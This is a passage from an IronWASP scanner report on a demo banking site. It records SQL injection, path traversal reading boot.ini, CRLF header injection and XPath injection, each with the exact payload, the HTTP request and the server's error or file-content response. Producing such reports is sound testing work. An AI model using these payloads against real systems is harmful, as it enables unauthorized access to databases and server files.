IronWASP sent ' as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is '.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw='&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5464

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = 'qqqq' AND password = ''''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbE[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----] = 'qqqq' AND password = ''''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = 'qqqq' AND password = ''''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.Data.Ole[---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent ¿'"( as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is ¿'"(.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=¿'"(&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5484

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = 'qqqq' AND password = '�'&quot;(''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleD[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]' AND password = '�'&quot;(''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = 'qqqq' AND password = '�'&quot;(''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.[---- Snipped parts of HTTP body section for brevity ----]
Reason 3:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - q'||'qqq
Payload B - q'+'qqq
Payload C - q' 'qqq
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The response for Payload A and C were similar to each other and is different from the response received for Payloads B. This indicates that the application was actually trying to perform the string concatenation on the server-side and that the backend database in use is MS SQL. Since incase of MS SQL database server Payloads MS SQL & A would have simply thrown an invalid SQL syntax exception their responses are similar. And Payload B would have executed without this error and so its response was different than the other two.
If the application was not actually performing the concatenation then all three payload should have received very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is q'||'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'%7c%7c'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response recieved for the payloads that used MS SQL database's concatenation syntax but similar to the response for the payload that used MySQL database's concatenation syntax

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is q'+'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'%2b'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the responses recieved for the payloads that used MySQL and Oracle databases' concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL database's syntax. The payload is q' 'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'+'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response recieved for the payloads that used MS SQL database's concatenation syntax but similar to the response for the payload that used Oracle database's concatenation syntax

Reason 4:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 8=8--
Payload B - qqqqxxx' or 7=5--
Payload C - qqqqxxx' or 7=7--
Payload D - qqqqxxx' or 5=8--
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The response for Payload A and C were similar to each other and were different from the response received for Payload B and D. This indicates that the application was actually evaluating the boolean condition in the payloads. So since Payload A and C both has a true boolean condition their responses are similar, C and D had a false boolean condition.
If the application was not actually evaluating the boolean condition then all four payload should have returned very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 8=8-- which evaluates to true. The payload is qqqqxxx' or 8=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+8%3d8--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=5-- which evaluates to false. The payload is qqqqxxx' or 7=5--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+7%3d5--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=7-- which evaluates to true. The payload is qqqqxxx' or 7=7--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+7%3d7--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 5=8-- which evaluates to false. The payload is qqqqxxx' or 5=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+5%3d8--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

Reason 5:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 's'='s
Payload B - qqqqxxx' or 's'='r
Payload C - qqqqxxx' or 't'='t
Payload D - qqqqxxx' or 't'='r
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The response for Payload A and C were similar to each other and were different from the response received for Payload B and D. This indicates that the application was actually evaluating the boolean condition in the payloads. So since Payload A and C both has a true boolean condition their responses are similar, C and D had a false boolean condition.
If the application was not actually evaluating the boolean condition then all four payload should have returned very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 's'='s which evaluates to true. The payload is qqqqxxx' or 's'='s

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'s'%3d's&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 's'='r which evaluates to false. The payload is qqqqxxx' or 's'='r

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'s'%3d'r&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 't'='t which evaluates to true. The payload is qqqqxxx' or 't'='t

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'t'%3d't&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 't'='r which evaluates to false. The payload is qqqqxxx' or 't'='r

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'t'%3d'r&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

Local File Include Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Affected Parameter:content
Parameter Location:Query
Description:
Local File Include/Path Traversal was identified in the content parameter of the Query section of the scanned request.

Local File Include is an issue where it is possible to load and view the raw contents of any files present on the web server. For more details on this issue refer https://www.owasp.org/index.php/Path_Traversal

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
IronWASP sent ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.htm as payload to the application. This payload tries to refer to the file boot.ini by traversing from the current directory with a series of ..\. If the application is vulnerable it will load the boot.ini file and send its contents in the response. The response that came back from the application after the payload was injected had the text [boot loader], which is usually found in boot.ini files. This indicates that the boot.ini file was loaded and its content printed in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the response sent for this payload and determine if it actually contains the contents of the boot.ini file. After that you can try changing the file name to something else and see if the server prints those file contents.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request refers to the boot.ini file by traversing upwards in the directory structure. The payload is ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.htm

GET http://demo.testfire.net/default.aspx?content=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains contents of the boot.ini file. This was caused by the payload

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:17 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7570

[---- Snipped parts of HTTP body section for brevity ----]s.htm">Careers</a></li>
</ul>
</td>
<td valign="top" colspan="3" class="bb">

<span id="_ctl0__ctl0_Content_Main_lblContent">[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, [---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.txt as payload to the application. This payload tries to refer to the file boot.ini by traversing from the current directory with a series of ..\. If the application is vulnerable it will load the boot.ini file and send its contents in the response. The response that came back from the application after the payload was injected had the text [boot loader], which is usually found in boot.ini files. This indicates that the boot.ini file was loaded and its content printed in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the response sent for this payload and determine if it actually contains the contents of the boot.ini file. After that you can try changing the file name to something else and see if the server prints those file contents.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request refers to the boot.ini file by traversing upwards in the directory structure. The payload is ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.txt

GET http://demo.testfire.net/default.aspx?content=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains contents of the boot.ini file. This was caused by the payload

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:19 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7570

[---- Snipped parts of HTTP body section for brevity ----]s.htm">Careers</a></li>
</ul>
</td>
<td valign="top" colspan="3" class="bb">

<span id="_ctl0__ctl0_Content_Main_lblContent">[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, [---- Snipped parts of HTTP body section for brevity ----]
Reason 3:
IronWASP sent four payloads to the application.
Payload A - aa/../inside_contact.htm
Payload B - aa../inside_contact.htm
Payload C - bb/../inside_contact.htm
Payload D - bb../inside_contact.htm

Payloads A and C are similar in nature. They both refer to the file inside_contact.htm by including an imaginary directory in the path (aa & bb) but then also invalidating it by traversing upwards by one directory using ../. So these payloads must have the same effect as referring to the file inside_contact.htm normally.
Payloads B and D are similar to each other but different from A & C. They refer to the file inside_contact.htm inside invalid directories (aa & bb).
If the application is vulnerable to Local File Include then the response for Payloads A & C must be similar to each other and different from responses for Payloads B&D. The responses for the injected payloads were analyzed and it was found that Payloads A & C got a similar looking response and were also different from responses got from Payloads B & D, thereby indicating the presence of this vulnerability.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the responses received for Payloads A, B, C and D. Analyze these payloads and verify if indeed A & C got similar responses and were different from B & D. You can also change the payloads for A & C by adding one more invalid directory and one more ../ to invalidate that directory. This must get the same response as the responses for A & C.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'aa'. The payload is aa/../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa%2f..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'aa' and so does not refer to the inside_contact.htm file. The payload is aa../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'bb'. The payload is bb/../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb%2f..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger before the previous.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'bb' and so does not refer to the inside_contact.htm file. The payload is bb../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger before the previous.

Reason 4:
IronWASP sent four payloads to the application.
Payload A - aa\..\inside_contact.htm
Payload B - aa..\inside_contact.htm
Payload C - bb\..\inside_contact.htm
Payload D - bb..\inside_contact.htm

Payloads A and C are similar in nature. They both refer to the file inside_contact.htm by including an imaginary directory in the path (aa & bb) but then also invalidating it by traversing upwards by one directory using ..\. So these payloads must have the same effect as referring to the file inside_contact.htm normally.
Payloads B and D are similar to each other but different from A & C. They refer to the file inside_contact.htm inside invalid directories (aa & bb).
If the application is vulnerable to Local File Include then the response for Payloads A & C must be similar to each other and different from responses for Payloads B&D. The responses for the injected payloads were analyzed and it was found that Payloads A & C got a similar looking response and were also different from responses got from Payloads B & D, thereby indicating the presence of this vulnerability.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the responses received for Payloads A, B, C and D. Analyze these payloads and verify if indeed A & C got similar responses and were different from B & D. You can also change the payloads for A & C by adding one more invalid directory and one more ..\ to invalidate that directory. This must get the same response as the responses for A & C.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'aa'. The payload is aa\..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa%5c..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'aa' and so does not refer to the inside_contact.htm file. The payload is aa..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'bb'. The payload is bb\..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb%5c..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger before the previous.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'bb' and so does not refer to the inside_contact.htm file. The payload is bb..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger before the previous.

Header Injection Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Header Injection was identified in the lang parameter of the Query section of the scanned request.

Header Injection is an issue where it is possible to inject a new HTTP Header in the response from the application. For more details on this issue refer http://en.wikipedia.org/wiki/HTTP_header_injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent \r\nNeww: Headerr as payload to the application. This payload has CRLF characters followed by the string Neww: Headerr which is in the format of a HTTP Header with name Neww and value Headerr. The response that came back from the application after injecting this payload has an HTTP header named Neww. This indicates that our payload caused an HTTP header to be injected in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can send the same payload but with different values for the header name part of the payload. If the response contains any HTTP headers with the specified names then there actually is Header Injection.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request attempts to insert a header with name 'Neww' in the response. The payload is \r\nNeww: Headerr

GET http://demo.testfire.net/bank/customize.aspx?lang=%0d%0aNeww%3a+Headerr HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response has a header named 'Neww' which was added because of the payload

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:45:47 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Neww: Headerr; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5895

[---- Snipped parts of HTTP body section for brevity ----]A2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">
Neww: Headerr</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
XPATH Injection Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/queryxpath.aspx?__VIEWSTATE=%2fwEPDwUKMTEzMDczNTAxOWRk&__EVENTVALIDATION=%2fwEWAwLNx%2b2YBwKw59eKCgKcjoPABw%3d%3d&_ctl0%3a_ctl0%3aContent%3aMain%3aTextBox1=Enter+title+(e.g.+IBM)&_ctl0%3a_ctl0%3aContent%3aMain%3aButton1=Query
Affected Parameter:_ctl0:_ctl0:Content:Main:TextBox1
Parameter Location:Query
Description:
XPATH Injection was identified in the _ctl0:_ctl0:Content:Main:TextBox1 parameter of the Query section of the scanned request.

XPATH Injection is an issue where it is possible execute XPATH queries on the XML file being referenced on the server-side. For more details on this issue refer https://www.owasp.org/index.php/XPATH_Injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent <!--'"a as payload to the application, this payload would cause an exception to happen in insecure XPATH queries. The response from the application for this payload had the error messages:
XPathException
MS.Internal.Xml.
These error messages are usually found in XPATH query related exceptions. Therefore this issue has been reported.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message is actually because of some exception on the server-side. Resend the same payload but without the single or double quote and check if the error message disappears.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger XPATH errors. The payload is: <!--'"a

GET http://demo.testfire.net/bank/queryxpath.aspx?__VIEWSTATE=%2fwEPDwUKMTEzMDczNTAxOWRk&__EVENTVALIDATION=%2fwEWAwLNx%2b2YBwKw59eKCgKcjoPABw%3d%3d&_ctl0%3a_ctl0%3aContent%3aMain%3aTextBox1=%3c!--'%22a&_ctl0%3a_ctl0%3aContent%3aMain%3aButton1=Query HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains XPATH error messages due to the error triggered by the payload

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 8430

[---- Snipped parts of HTTP body section for brevity ----]Content_lblSummary">This is an unclosed string. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Xml.XPath.XPathException: This is an unclosed string.
at MS.Internal.Xml.XPath.XPathScanner.ScanString()
at MS.Internal.Xml.XPath.XPathScanner.NextLex()
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMethod(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
